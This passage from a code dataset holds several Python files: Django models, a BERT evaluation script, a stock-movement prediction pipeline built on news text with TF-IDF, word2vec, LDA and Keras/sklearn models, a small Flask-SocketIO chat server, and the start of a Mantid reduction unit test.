truck_driver.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"352613271","text":"from django.db import models\n\n\nclass Program(models.Model):\n name = models.CharField(max_length=255)\n\n class Meta:\n ordering = ['-id']\n db_table = 'programs'\n\n\nclass Version(models.Model):\n name = models.CharField(max_length=255)\n program = models.ForeignKey(Program, on_delete=models.CASCADE, related_name='versions')\n\n class Meta:\n ordering = ['-id']\n db_table = 'program_versions'\n unique_together = ('name', 'program',)\n","sub_path":"bughound_api/programs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"387291005","text":"# -*- coding: utf-8 -*-\n\n\nimport torch\nfrom sys import platform\nfrom torch.utils.data import DataLoader\nfrom transformers import BertTokenizer\nfrom model import BertModelTest\nfrom utils import test\nfrom data import DataPrecessForSentence\n\ndef main(test_file, pretrained_file, batch_size=32):\n\n device = torch.device(\"cuda\")\n bert_tokenizer = BertTokenizer.from_pretrained('bert-base-chinese', do_lower_case=True)\n print(20 * \"=\", \" Preparing for testing \", 20 * \"=\")\n if platform == \"linux\" or platform == \"linux2\":\n checkpoint = torch.load(pretrained_file)\n else:\n checkpoint = torch.load(pretrained_file, map_location=device)\n # Retrieving model parameters from checkpoint.\n print(\"\\t* Loading test data...\") \n test_data = DataPrecessForSentence(bert_tokenizer, test_file)\n test_loader = DataLoader(test_data, shuffle=True, batch_size=batch_size)\n print(\"\\t* Building model...\")\n model = BertModelTest().to(device)\n model.load_state_dict(checkpoint[\"model\"])\n print(20 * \"=\", \" Testing BERT model on device: {} \".format(device), 20 * \"=\")\n batch_time, total_time, accuracy, auc = test(model, test_loader)\n print(\"\\n-> Average batch processing time: {:.4f}s, total test time: {:.4f}s, accuracy: {:.4f}%, auc: {:.4f}\\n\".format(batch_time, total_time, (accuracy*100), auc))\n\n\nif __name__ == \"__main__\":\n main(\"../data/LCQMC_dev.csv\", \"models/best.pth.tar\")","sub_path":"AI-assists/Bert/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"644114473","text":"import pandas as pd\nimport numpy as np\nimport math\nimport datetime\nfrom datetime import timedelta\nimport sqlite3\nimport re\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\nimport warnings\nimport pytz\nimport pickle\nimport nltk\nimport en_core_web_sm\n\nfrom matplotlib import pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.python.keras.preprocessing.text import Tokenizer\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Embedding, GRU\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow import pad\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.manifold import TSNE\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.naive_bayes import MultinomialNB, BernoulliNB\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model 
import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.cluster import SpectralClustering\nfrom sklearn.metrics import confusion_matrix, accuracy_score\n\nfrom nltk.corpus import stopwords\n# remove_stopwords is aliased because a local remove_stopwords(texts, stop_words) is defined further down\nfrom gensim.parsing.preprocessing import preprocess_documents, remove_stopwords as gensim_remove_stopwords\nfrom gensim.utils import simple_preprocess\nfrom gensim.test.utils import get_tmpfile\nfrom gensim.models import Phrases\nfrom gensim.models.phrases import Phraser\nfrom gensim.models import Word2Vec\nimport gensim.corpora as corpora\nfrom gensim.models.ldamodel import LdaModel\nfrom gensim.models import CoherenceModel\n\nimport spacy\n\nimport pyLDAvis\nimport pyLDAvis.gensim\n\n\n# directory listing adapted from pycruft on Stack Overflow\n# this function concatenates the stock data from the different sources within a path directory\ndef gather_stocks_from_dir(path):\n    dataframe_stocks_complete = pd.DataFrame()\n\n    # gathers a list of names of all files in the dir\n    stock_files = [f for f in listdir(path) if isfile(join(path, f))]\n\n    for file in stock_files:\n        if file.endswith('.p'):\n            temp_stocks_dataframe = pd.read_pickle(path + '/' + file)\n            dataframe_stocks_complete = dataframe_stocks_complete.append(temp_stocks_dataframe)\n\n    return dataframe_stocks_complete\n\n\ndef gather_data_from_stocks():\n    stocks_dataframe = gather_stocks_from_dir('./Stocks')\n\n    # gather the values that will be used for regression\n    y_class_stocks = pd.DataFrame([stocks_dataframe['close']]).transpose()\n\n    # gather a list of close prices so that a second column, updown, can be created\n    close_list = y_class_stocks['close']\n\n    close_last = close_list[0]\n    close_updown = [None]\n\n    for ind in range(1, len(close_list)):\n        if close_last <= close_list[ind]:\n            close_updown.append('up')\n        elif close_last > close_list[ind]:\n            close_updown.append('down')\n        close_last = close_list[ind]\n\n    # add classification list to set of stocks\n    # ERROR - with all stocks in the dataframe there exists an index where the symbol changes,\n    # which produces a single wrong value at each symbol boundary\n    y_class_stocks['updown'] = close_updown\n\n    return y_class_stocks.reset_index()\n\n\n# gather data from the sqlite3 database into a list for easier usage\ndef gather_news_content(database_path):\n    connect = sqlite3.connect(database_path)\n    cursor = connect.cursor()\n\n    cursor.execute('''\n    SELECT query, title, description, content, published_at FROM documents;\n    ''')\n    news_data = cursor.fetchall()\n    # rows come back as tuples: (query, title, description, content, published_at)\n\n    # replacer strips special characters and the trailing '[+N chars]' marker,\n    # returning (query_list, dates_list, content_list)\n    news_data = replacer(news_data)\n\n    # close connection and cursor\n    cursor.close()\n    connect.close()\n\n    return news_data\n\n\ndef replacer(list_data):\n    # for each piece of content within the list_data\n    query_list = []\n    dates_list = []\n    content_list = []\n\n    for content in list_data:\n        content = list(content)\n\n        # remove the query from the row so that only the text fields remain\n        query = content[0]\n        del content[0]\n\n        # remove the date from each of the pieces of content\n        date = content[-1]\n        del content[-1]\n\n        # for each piece of information within the content of each document\n        temp_collect = []\n        for index in range(len(content)):\n            if content[index] is not None:\n                # replaces certain parts of the content of the data for better readability\n                content[index] = re.sub(r'\\s+', ' ', content[index])\n                content[index] = re.sub(r'<[/]*\\w>', '', content[index])\n                content[index] = 
re.sub(r'[?]|[!]|[,]', '', content[index])\n                end_string_list = content[index].split('[')\n\n                # keep only the text before the trailing '[+N chars]' marker, lowercased\n                temp_collect.append(end_string_list[0].lower())\n\n        # remove excess date information\n        if len(date) >= 10:\n            date = date[0:10]\n\n        query_list.append(query)\n        dates_list.append(date)\n        content_list.append(' '.join(temp_collect))\n\n    # convert string to datetime\n    for index_in_date_list in range(len(dates_list)):\n        dates_list[index_in_date_list] = datetime.datetime.strptime(dates_list[index_in_date_list]\n                                                                    , '%Y-%m-%d').replace(tzinfo=pytz.utc)\n\n    return query_list, dates_list, content_list\n\n\ndef preprocess_content_for_gensim(content_list):\n    for ind in range(len(content_list)):\n        # FIX: use gensim's one-argument remove_stopwords (imported under an alias);\n        # the local two-argument remove_stopwords defined below would raise a TypeError here\n        temp_store = gensim_remove_stopwords(content_list[ind])\n        temp_store = temp_store.replace('-', '').split(' ')\n        content_list[ind] = temp_store\n    return content_list\n\n\ndef tsne_plot(model, word, perplexity, quit_words):\n    # Gather the closest words a few times to have some data to look at\n    close_words = model.similar_by_word(word)\n    close_words_extra = []\n    for word_item in close_words:\n        close_words_extra.append(model.similar_by_word(word_item[0]))\n    close_words_final = []\n    for word_item in close_words_extra:\n        # FIX: word_item is a list of (word, score) tuples, so the word itself is word_item[0][0]\n        close_words_final.append(model.similar_by_word(word_item[0][0]))\n    close_words_final.append(close_words)\n\n    X_data = np.empty((0, model.vector_size))\n\n    word_labels = [word]\n\n    # adapted from Aneesha Bakharia's notebook:\n    # https://medium.com/@aneesha/using-tsne-to-plot-a-subset-of-similar-words-from-word2vec-bb8eeaea6229\n    X_data = np.append(X_data, np.array([model[word]]), axis=0)\n    for word_and_score in close_words_final:\n        for words in word_and_score:\n            word_vector = model[words[0]]\n            word_labels.append(words[0])\n            X_data = np.append(X_data, np.array([word_vector]), axis=0)\n\n    tsne = TSNE(n_components=2, n_iter=10000, perplexity=perplexity, n_iter_without_progress=500)\n    y = tsne.fit_transform(X_data)\n\n    x_coordinates = []\n    y_coordinates = []\n\n    for x in y:\n        x_coordinates.append(x[0])\n        y_coordinates.append(x[1])\n\n    plt.scatter(x_coordinates, y_coordinates)\n\n    i = 0\n    for label, x_co, y_co in zip(word_labels, x_coordinates, y_coordinates):\n        plt.annotate(label, xy=(x_co, y_co), xytext=(0, 0), textcoords='offset points')\n        if i > quit_words:\n            break\n        i += 1\n    plt.xlim(min(x_coordinates) + 0.5, max(x_coordinates) + 0.5)\n    plt.ylim(min(y_coordinates) + 0.5, max(y_coordinates) + 0.5)\n    plt.show()\n\n\n# return the rows dated before and the rows dated on/after the given date\ndef gather_data_before_and_after(dataframe, date):\n    beforedataframe = pd.DataFrame()\n    afterdataframe = pd.DataFrame()\n    for index, row in dataframe.iterrows():\n        if row['date'] < date:\n            beforedataframe = beforedataframe.append(row)\n        else:\n            afterdataframe = afterdataframe.append(row)\n        if index % 500 == 0:\n            print(index)\n    return beforedataframe, afterdataframe\n\n\n# return a dataframe of all rows dated before the given date\ndef data_before_date(dataframe, date):\n    beforedataframe = pd.DataFrame()\n    for index, row in dataframe.iterrows():\n        if row['date'] < date:\n            beforedataframe = beforedataframe.append(row)\n    return beforedataframe, date\n\n\n# return a dataframe of all rows dated on or after the given date\ndef data_after_date(dataframe, date):\n    afterdataframe = pd.DataFrame()\n    for index, row in dataframe.iterrows():\n        if row['date'] >= date:\n            afterdataframe = afterdataframe.append(row)\n    return afterdataframe, date
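\n\n\n# Editor's note: a vectorized equivalent of the three iterrows-based helpers\n# above (a hedged sketch; it is not called elsewhere in this module and assumes\n# the 'date' column is comparable to the given date).\ndef split_by_date(dataframe, date):\n    mask = dataframe['date'] < date  # boolean mask instead of a Python loop\n    return dataframe[mask], dataframe[~mask]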
\n\n\n# Splits the dataset for training and testing by the input date.\ndef tfidf_data_before_date(dataframe, date):\n    tfidf_total_of_content = []\n    tfidf_vector = TfidfVectorizer(stop_words='english', max_features=1000)\n    # FIX: the original called fit() once per pre-date row, and every fit() resets\n    # the vocabulary, so only the last document survived; fit once on all of them\n    train_docs = [row['content'] for _, row in dataframe.iterrows() if row['date'] < date]\n    tfidf_vector.fit(train_docs)\n\n    for index, row in dataframe.iterrows():\n        tfidf_total_of_content.append(tfidf_vector.transform([row['content']]).todense())\n\n    dataframe['tfidf'] = tfidf_total_of_content\n\n    train_data, test_data = gather_data_before_and_after(dataframe, date)\n\n    return tfidf_vector, train_data, test_data\n\n\n# Builds the tf-idf features for the sklearn models\ndef tfidf_data(dataframe, date, full_return=True):\n    tfidf_vector = TfidfVectorizer(stop_words='english', max_features=5000)\n    train = []\n    test = []\n    tfidf_total_from_dataframe = []\n\n    for index, row in dataframe.iterrows():\n        if row['date'] < date:\n            train.append(row['content'])\n        else:\n            test.append(row['content'])\n\n    # fit the vocabulary on the training documents only, then reuse it for the test set\n    train_tfidf = tfidf_vector.fit_transform(train)\n    test_tfidf = tfidf_vector.transform(test)\n    train_df = pd.DataFrame(train_tfidf.todense())\n    test_df = pd.DataFrame(test_tfidf.todense())\n    tfidf_total_of_content = train_df.append(test_df, ignore_index=True)\n    for index, row in dataframe.iterrows():\n        tfidf_slice_of_content = np.array(tfidf_total_of_content.iloc[index])\n        tfidf_total_from_dataframe.append(tfidf_slice_of_content)\n    dataframe['tfidf'] = tfidf_total_from_dataframe  # this adds a 'tfidf' column of numpy vectors\n\n    if full_return:\n        data_before, data_after = gather_data_before_and_after(dataframe, date)\n        return dataframe, tfidf_total_of_content, tfidf_vector, data_before, data_after\n    else:\n        return dataframe, tfidf_total_of_content, tfidf_vector, None, None\n\n\ndef create_gensim_word_2_vec_model(content_list):\n    gensim_content_list = preprocess_content_for_gensim(content_list)\n    bigrams = Phrases(gensim_content_list)\n    word_to_vec_model = Word2Vec(bigrams[gensim_content_list], min_count=1, window=3, size=300)\n    return word_to_vec_model\n\n\ndef load_gensim_word_2_vec_model(path):\n    file = get_tmpfile(path)\n    return Word2Vec.load(file)\n\n\ndef updown_to_digit(training):\n    # encode the binary up/down labels as 1/0\n    training_class2 = list()\n\n    for t_class in training:\n        if t_class == 'up':\n            training_class2.append(1)\n        else:\n            training_class2.append(0)\n\n    training_class = np.asarray(training_class2).astype('int8')\n\n    return training_class\n\n\ndef updown_to_1_0(training, testing):\n    # encode the binary up/down labels of both sets as 1/0\n    training_class2 = list()\n    testing_class2 = list()\n\n    for t_class in training:\n        if t_class == 'up':\n            training_class2.append(1)\n        else:\n            training_class2.append(0)\n\n    for t_class in testing:\n        if t_class == 'up':\n            testing_class2.append(1)\n        else:\n            testing_class2.append(0)\n    training_class = np.asarray(training_class2).astype('int8')\n    testing_class = np.asarray(testing_class2).astype('int8')\n\n    return training_class, testing_class\n\n\n# training and testing data are assumed to be lists of strings (df['content'])\n# this was a modification of https://towardsdatascience.com/how-to-create-word-embedding-in-tensorflow-ed0a61507dd0\n# author Francesco Zuppichini
\ndef keras_word_embedding_updown(training_data, testing_data, training_class, testing_class,\n                                embedding_dimension=None, model_ex='simple', updown=True,\n                                save_path='Models'):\n    # create tokenizer to generate training and testing tokens for later use\n    tokens = Tokenizer()\n    total_text = training_data + testing_data\n    tokens.fit_on_texts(total_text)\n\n    # length of the longest document in tokens, so every sequence can be padded to it\n    max_token_length = max([len(strings.split()) for strings in total_text])\n\n    # num words in the vocab of the corpus\n    vocab_size = len(tokens.word_index) + 1\n\n    # convert training and testing strings to tokens\n    training_data_tokens = tokens.texts_to_sequences(training_data)\n    testing_data_tokens = tokens.texts_to_sequences(testing_data)\n\n    # pads the training and testing data with zeros at the end so all sequences are the same length\n    training_data_tokens_pad = pad_sequences(training_data_tokens, maxlen=max_token_length, padding='post')\n    testing_data_tokens_pad = pad_sequences(testing_data_tokens, maxlen=max_token_length, padding='post')\n\n    if embedding_dimension is None:\n        embedding_dimension = 100\n\n    # for binary classification, encode the up/down labels as 1/0\n    if updown:\n        training_class, testing_class = updown_to_1_0(training_class, testing_class)\n\n    model = Sequential()\n    model.add(Embedding(vocab_size, embedding_dimension, input_length=max_token_length))\n\n    # the GRU has no dropout because of a bug in TensorFlow 2.0 that prevents a GRU with dropout from being saved\n    if model_ex == 'simple':\n        # create a word embedding model\n        model.add(GRU(units=embedding_dimension, dropout=0, recurrent_dropout=0))\n        model.add(Dense(1, activation='sigmoid'))\n        # learning function for that model\n        model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n        # if this reports 100% accuracy, something broke\n    elif model_ex == 'relu':\n        # embedding model with an extra relu layer\n        model.add(GRU(units=embedding_dimension))\n        model.add(Dense(units=50, activation='relu'))\n        model.add(Dense(1, activation='sigmoid'))\n        # learning function for that model\n        model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n    callbacks = ModelCheckpoint(save_path,\n                                save_best_only=True,\n                                verbose=1)\n\n    model.fit(training_data_tokens_pad, training_class, batch_size=64,\n              epochs=15, verbose=2, validation_data=(testing_data_tokens_pad, testing_class),\n              callbacks=[callbacks])\n\n    return model
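\n\n\ndef _tokenize_pad_demo():\n    # Editor's hedged sketch of the tokenize-then-pad step used above; the toy\n    # sentences are illustrative only. Uses the Tokenizer/pad_sequences imports\n    # already at the top of this module.\n    demo_tokens = Tokenizer()\n    demo_texts = ['stocks rally today', 'stocks fall']\n    demo_tokens.fit_on_texts(demo_texts)\n    sequences = demo_tokens.texts_to_sequences(demo_texts)  # e.g. [[1, 2, 3], [1, 4]]\n    # 'post' pads with zeros at the end so both sequences reach length 3\n    return pad_sequences(sequences, maxlen=3, padding='post')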
\n\n\ndef keras_tfidf(training_data, testing_data, training_class, testing_class, tfidf_vectorizer,\n                model_ex='simple', updown=True, save_path='NN_STOCKS_UPDOWN_TFIDF'):\n    feature_len = len(tfidf_vectorizer.get_feature_names())\n\n    # for binary classification, encode the up/down labels as 1/0\n    if updown:\n        training_class, testing_class = updown_to_1_0(training_class, testing_class)\n\n    model = Sequential()\n\n    if model_ex == 'simple':\n        model.add(Dense(units=feature_len, activation='sigmoid'))\n        model.add(Dense(units=100, activation='sigmoid'))\n        model.add(Dense(units=1, activation='sigmoid'))  # FIX: binary_crossentropy expects a probability; the original final layer had no activation\n        model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n    elif model_ex == 'relu':  # FIX: was a second independent if\n        model.add(Dense(units=feature_len, activation='relu'))\n        model.add(Dense(units=100, activation='sigmoid'))\n        model.add(Dense(units=1, activation='sigmoid'))  # FIX: as above\n        model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n    callbacks = ModelCheckpoint(save_path,\n                                save_best_only=True,\n                                verbose=1)\n\n    model.fit(training_data, training_class, batch_size=64, epochs=15,\n              verbose=2, callbacks=[callbacks], validation_data=(testing_data, testing_class))\n\n    return model\n\n\ndef date_and_content_class_gatherer(stocks_data, content_data):\n    # refactor: one dict of lists per measure replaces the original 28 parallel\n    # list variables and the 14-branch if/elif chain (behavior unchanged)\n    symbols = ['AMZN', 'AMD', 'AAPL', 'JPM', 'GME', 'GOOGL', 'HPQ', 'LYFT',\n               'MSFT', 'NTDOY', 'NVDA', 'SNE', 'TD', 'UBER']\n    updown = {symbol: [] for symbol in symbols}\n    close = {symbol: [] for symbol in symbols}\n\n    for _, content in content_data.iterrows():\n        date = content['date']\n        stocks_date = stocks_data.loc[stocks_data['date'] == date]\n\n        # This section of code is for selecting the monday after a weekend if the content was posted on a weekend\n        # this also accounts for days that are considered holidays\n        # placing the close and updown at the end of the holiday\n        # this breaks if the date of content is beyond the date of stocks\n        while stocks_date.empty:\n            date = date + timedelta(days=1)\n            stocks_date = stocks_data.loc[stocks_data['date'] == date]\n\n        for _, stock in stocks_date.iterrows():  # '_' avoids shadowing the outer loop's index\n            symbol = stock['symbol']\n            if symbol in updown:\n                updown[symbol].append(stock['updown'])\n                close[symbol].append(stock['close'])\n\n    for symbol in symbols:\n        content_data[symbol + '_updown'] = updown[symbol]\n        content_data[symbol + '_close'] = close[symbol]\n\n    return content_data\n\n\ndef sklearn_linear_models_classifier(training_data, training_class, name, models, model_params,\n                                     model_save_folders, model_names):\n    training_class = updown_to_digit(training_class)\n    # build the feature vectors once instead of once per model (behavior unchanged)\n    vector_total_content = []\n    for index, row in training_data.iterrows():\n        vector_slice_of_content = np.array(training_data.iloc[index])\n        vector_total_content.append(vector_slice_of_content)\n    for model, params, save, save_name in zip(models, model_params, model_save_folders, model_names):\n        print(save)\n        grid = GridSearchCV(model, params, cv=5, n_jobs=3, scoring='accuracy')\n        grid.fit(vector_total_content, training_class)\n        with open('SKLEARN_MODELS/' + name + '/' + save + '/' + save_name, 'wb') as file:\n            pickle.dump(grid, file)\n        with open('SKLEARN_MODELS/' + name + '/' + save + '/' + save_name + 'output.txt', 'w+') as file:\n            file.write(str(grid.best_estimator_))\n            file.write('\\n')\n            file.write(str(grid.best_score_))\n\n\n# This next section of functions was mainly taken from week 9 content\ndef sent_to_words(sentences):\n    for sentence in sentences:\n        yield simple_preprocess(str(sentence), deacc=True)\n\n\n# local variant used by the LDA pipeline; the gensim import at the top is aliased to avoid clashing with it\ndef remove_stopwords(texts, stop_words):\n    return [[word for word in simple_preprocess(str(doc)) if word not in stop_words] for doc in texts]\n\n\ndef make_bigrams(texts, bigram_mod):\n    return [bigram_mod[doc] for doc in texts]\n\n\ndef make_trigrams(texts, bigram_mod, trigram_mod):\n    return [trigram_mod[bigram_mod[doc]] for doc in texts]\n\n\ndef lemmatization(texts, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV']):\n    \"\"\"https://spacy.io/api/annotation\"\"\"\n    texts_out = []\n    nlp = spacy.load('en', disable=['parser', 'ner'])\n    for sent in texts:\n        doc = nlp(\" \".join(sent))\n        texts_out.append([token.lemma_ for token in doc if token.pos_ in allowed_postags])\n    return texts_out\n\n\ndef visulaizer_of_gensim(content_list):\n    stop_words = stopwords.words('english')\n\n    data_words = list(sent_to_words(content_list))\n\n    bigram = Phrases(data_words, min_count=5, threshold=100)\n    trigram = Phrases(bigram[data_words], threshold=100)\n    bigram_mod = Phraser(bigram)\n    trigram_mod = Phraser(trigram)\n\n    data_words_nostops = remove_stopwords(data_words, stop_words)\n    data_words_bigrams = make_bigrams(data_words_nostops, bigram_mod)\n    data_words_trigrams = make_trigrams(data_words_bigrams, bigram_mod, trigram_mod)\n    data_lemmatized = lemmatization(data_words_trigrams, allowed_postags=['NOUN', 'ADJ', 'VERB', 'ADV'])\n\n    id2word = corpora.Dictionary(data_lemmatized)\n    texts = data_lemmatized\n    corpus = [id2word.doc2bow(text) for text in texts]\n\n    lda_model = LdaModel(corpus=corpus,\n                         id2word=id2word,\n                         num_topics=20,\n                         random_state=100,\n                         update_every=1,\n                         chunksize=100,\n                         passes=10,\n                         alpha='auto',\n                         per_word_topics=True)\n\n    vis = pyLDAvis.gensim.prepare(lda_model, corpus, id2word)\n\n    return vis
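\n\n\ndef _phrases_demo():\n    # Editor's hedged sketch of what Phrases/Phraser do in the word2vec and LDA\n    # pipelines above: sufficiently frequent pairs are merged into one token.\n    # The toy corpus and threshold are illustrative assumptions.\n    docs = [['new', 'york', 'stocks'], ['new', 'york', 'rally']] * 10\n    bigram = Phraser(Phrases(docs, min_count=2, threshold=0.1))\n    return bigram[docs[0]]  # e.g. ['new_york', 'stocks']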
\n\n\nif __name__ == '__main__':\n    warnings.filterwarnings(\"ignore\")\n    # news data is gathered in the format [query, date, content],\n    # where content is the title, description and body joined together.\n    # Some rows have a query of None; they were collected with an older version of searchthenews\n    # and can serve as another test label for which class of news a document was pulled from\n    # query_list, dates_list, content_list = gather_news_content('news.db')\n    # content_dataframe = pd.DataFrame([query_list, dates_list, content_list]).transpose()\n    # content_dataframe.columns = ['query', 'date', 'content']\n\n    # Stocks information\n    stocks = gather_data_from_stocks()\n\n    # gather all of the information into a single dataframe so that building training and testing sets becomes easier.\n    # This increases the size of the file, but that is a fair tradeoff that I am willing to make.\n    # The dataframe is then saved so that the preprocessing\n    # of the content and stocks information only happens a single time\n    # total_data = date_and_content_class_gatherer(stocks, content_dataframe)\n    # total_data.to_pickle('total_data.p')\n\n    # all lines above this can be commented out if the total_data.p file exists\n    total_data = pd.read_pickle('total_data.p')\n    working_date = datetime.datetime.strptime('2019-11-15', '%Y-%m-%d').replace(tzinfo=pytz.UTC)\n\n    # print('Dataframe split')\n    # total_before, total_after = gather_data_before_and_after(total_data, working_date)\n    # total_before.to_pickle('total_before.p')\n    # total_after.to_pickle('total_after.p')\n\n    # total_before = pd.read_pickle('total_before.p')\n    # total_after = pd.read_pickle('total_after.p')\n\n    '''\n    print('NN Training')\n    names = stocks.symbol.unique()\n    for name in names:\n        types = ['relu', 'simple']\n        for nn_type in types:\n            model = keras_word_embedding_updown(total_before['content'].tolist(), total_after['content'].tolist(),\n                                                np.asarray(total_before[name + '_updown'].tolist()),\n                                                np.asarray(total_after[name + '_updown'].tolist()),\n                                                embedding_dimension=100, updown=True,\n                                                model_ex=nn_type,\n                                                save_path='NN_STOCKS_UPDOWN_EMBEDDED/' + name + '/' + nn_type.upper())\n    '''\n\n    # create a tfidf of the content_list\n    # tfidf_vector, tfidf_data_before, tfidf_data_after = tfidf_data_before_date(total_data,\n    #                                                                            datetime.datetime(2019, 11, 15,\n    #                                                                            tzinfo=pytz.UTC))\n\n    # with open('tfidf_vector.p', 'wb') as file:\n    #     pickle.dump(tfidf_vector, file)\n\n    # with open('tfidf_vector.p', 'rb') as file:\n    #     tfidf_vector = pickle.load(file)\n\n    # tfidf_data_before.to_pickle('tfidf_data_before')\n    # tfidf_data_after.to_pickle('tfidf_data_after')\n\n    # tfidf_data_before = pd.read_pickle('tfidf_data_before')\n    # tfidf_data_after = pd.read_pickle('tfidf_data_after')\n    # print(tfidf_data_before.head())\n    # print(tfidf_data_after.head())\n\n    '''\n    print('NN Training')\n    names = stocks.symbol.unique()\n    for name in names:\n        types = ['SIMPLE', 'RELU']\n        for nn_type in types:\n            model = keras_tfidf(np.asarray(tfidf_data_before['tfidf'].tolist()),\n                                np.asarray(tfidf_data_after['tfidf'].tolist()),\n                                np.asarray(tfidf_data_before[name + '_updown'].tolist()),\n                                np.asarray(tfidf_data_after[name + '_updown'].tolist()),\n                                tfidf_vector,\n                                updown=True,\n                                model_ex=nn_type.lower(),\n                                save_path='NN_STOCKS_UPDOWN_TFIDF/' + name + '/' + nn_type.upper())\n    '''\n\n    # MultinomialNB, BernoulliNB, SVC, RandomForestClassifier, LinearRegression, LogisticRegression\n\n    total_data, tfidf_total_of_content, tfidf_vector,\\\n        data_before, data_after = tfidf_data(total_data, working_date, full_return=False)\n\n    # total_data_tfidf.to_pickle('total_data_tfidf.p')\n\n    # total_data_tfidf = pd.read_pickle('total_data_tfidf.p')\n\n    bnb = BernoulliNB()\n    mnb = MultinomialNB()\n    rf = RandomForestClassifier()\n    svc = 
SVC(gamma='scale')\n linr = LinearRegression()\n logr = LogisticRegression()\n knn = KNeighborsClassifier()\n sc = SpectralClustering()\n\n \"\"\"\n models = [sc, bnb, mnb, rf, linr, logr, knn]\n model_names = ['sc', 'bnb', 'mnb', 'rf', 'linr', 'logr', 'knn']\n model_save_folders = ['SC', 'BNB', 'MNB', 'RF', 'LINR', 'LOGR', 'KNN']\n models_params = [{'n_clusters': [2, 3, 4, 5, 6], 'n_init': [100]},\n {'alpha': [100, 1.0, 0.1], 'fit_prior': [True, False]},\n {'alpha': [100, 1.0, 0.1], 'fit_prior': [True, False]},\n {'n_estimators': [10, 100], 'criterion': ['gini', 'entropy']},\n {'fit_intercept': [True, False], 'normalize': [True, False]},\n {'dual': [True, False]},\n {'n_neighbors': [2, 3, 4, 5, 6], 'weights': ['uniform', 'distance']}]\n \"\"\"\n\n models = [svc]\n model_names = ['svc']\n model_save_folders = ['SVC']\n models_params = [{'C': [1.0], 'gamma': ['scale'], 'verbose': [True]}]\n\n names = stocks.symbol.unique()\n for name in names:\n if name == 'TD' or name == 'SNE' or name == 'UBER':\n print(name)\n sklearn_linear_models_classifier(tfidf_total_of_content,\n total_data[name + '_updown'], name,\n models, models_params, model_save_folders, model_names)\n else:\n continue\n\n # TSNE PLOT OF WORD2VEC similar words\n # word_to_vec_model = create_gensim_word_2_vec_model(content_list)\n # word_to_vec_model = load_gensim_word_2_vec_model('content_word2vec.p')\n # tsne_plot(word_to_vec_model, 'sony', 50, 20)\n\n # LDA topic model\n # vis = visulaizer_of_gensim(content_list=content_list)\n # pyLDAvis.save_html(vis, 'test.html')\n\n # {'n_clusters': [2, 3, 4, 5, 6], 'n_init': [10]},\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":30812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119185248","text":"from flask import Flask, render_template, request\nfrom flask_socketio import SocketIO\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, cors_allowed_origins='*')\n\nroom = {\n\n}\n\nchat = []\n\n@socketio.on('message')\ndef handle_message(message):\n print('received message: ' + message)\n\n@socketio.on('connect_room')\ndef connect_room(nickname):\n room[request.sid] = { 'name': str(nickname) }\n socketio.emit('current_users', room, broadcast=True)\n\n@socketio.on('send_message')\ndef send_message(message):\n chat.append( {'user': room[request.sid], 'message': message})\n socketio.emit('new_message_on_chat', chat, broadcast=True)\n\nif __name__ == '__main__':\n socketio.run(app)\n\n\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368739449","text":"import unittest\nfrom MantidFramework import mtd\nmtd.initialise()\nfrom mantidsimple import LoadAscii, ConvertToHistogram\nfrom reduction import Reducer, ReductionStep, validate_step\n\n# Make sure we can import the UI\nfrom reduction_application import ReductionGUI\n\nclass TestReductionStep(ReductionStep):\n def __init__(self):\n self.some_value = 5\n def execute(self, reducer, workspace):\n return self.some_value\n \nclass ReducerTest(unittest.TestCase):\n \n def test_append_step(self):\n \"\"\"\n Test that a Mantid algorithm function can be added to a Reducer object\n \"\"\"\n r = Reducer()\n # An algorithm with a mandatory property that is NOT InputWorkspace or OutputWorkspace\n r.append_step(LoadAscii, \"AsciiExample.txt\", None)\n # Algorithm with InputWorkspace 
and OutputWorkspace\n r.append_step(ConvertToHistogram, None, None)\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n mtd.deleteWorkspace(\"test2\")\n\n def test_pars_variation(self):\n \"\"\"\n Variations for parameter specification\n \"\"\"\n r = Reducer()\n # An algorithm with a mandatory property that is NOT InputWorkspace or OutputWorkspace\n r.append_step(LoadAscii, Filename=\"AsciiExample.txt\", OutputWorkspace=None)\n # Algorithm with InputWorkspace and OutputWorkspace\n r.append_step(ConvertToHistogram, None, None)\n for item in r._reduction_steps:\n result = item.execute(r, \"test2\")\n \n # Check that the workspace was created\n self.assertNotEqual(mtd[\"test2\"], None)\n mtd.deleteWorkspace(\"test2\")\n \n def test_output_wksp(self):\n \"\"\"\n Similar to previous test, but we specify the output workspace\n \"\"\"\n r = Reducer()\n # An algorithm with a mandatory property that is NOT InputWorkspace or OutputWorkspace\n r.append_step(LoadAscii, \"AsciiExample.txt\", None)\n # Algorithm with InputWorkspace and OutputWorkspace\n 